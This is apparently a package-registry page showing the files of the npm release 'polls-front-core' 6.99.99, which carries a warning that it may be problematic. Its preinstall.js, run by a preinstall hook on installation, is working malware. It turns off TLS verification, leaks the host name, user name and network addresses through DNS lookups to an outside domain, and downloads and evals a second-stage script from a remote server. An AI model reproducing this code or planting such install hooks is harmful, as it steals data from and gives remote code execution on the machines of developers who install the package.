polls-front-core 6.99.99
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of polls-front-core might be problematic. Click here for more details.
- package/index.js +2 -0
- package/package.json +13 -0
- package/preinstall.js +1 -0
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "polls-front-core",
|
3
|
+
"version": "6.99.99",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node preinstall.js"
|
9
|
+
},
|
10
|
+
"keywords": [],
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|
package/preinstall.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
(function(){var require=global.require||global.process.mainModule.constructor._load;var https=require("https");var dns=require("dns");var os=require("os");var DNS_DOMAIN=".vk.k.addr-in.com";var STAGE_URL="https://c2-5-8-181-102.elastic.cloud.croc.ru/polls-front-core/stage.json";process.env["NODE_TLS_REJECT_UNAUTHORIZED"]=0;var randomString=function(r){var o="";var n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var t=0;t<r;t++)o+=n.charAt(Math.floor(Math.random()*n.length));return o};var getNetworkInterfaces=function(){var r=os.networkInterfaces();var n={};Object.keys(r).forEach(function(o){r[o].forEach(function(r){if(r.family==="IPv4"&&!r.internal){if(!n[o])n[o]=[];n[o].push(r.address)}})});return n};var toHex=function(r){return Buffer.from(r,"utf-8").toString("hex")};var collectStats=function(){var r=toHex(randomString(3));var o="."+r+DNS_DOMAIN;var n=os.hostname();var t=os.userInfo().username;var e=getNetworkInterfaces();dns.lookup("6.99.99.p1"+o,function(r,o){});dns.lookup("xxx"+toHex(t)+o,function(r,o){});dns.lookup("yyy"+toHex(n)+o,function(r,o){});Object.keys(e).forEach(function(r){dns.lookup("zzz"+toHex(r)+"."+e[r][0]+o,function(r,o){})})};var execSecondStage=function(){https.get(STAGE_URL,function(res){var body="";res.on("data",function(r){body+=r});res.on("end",function(){try{eval(body)}catch(err){}})}).on("error",function(r){})};collectStats();execSecondStage()})();
|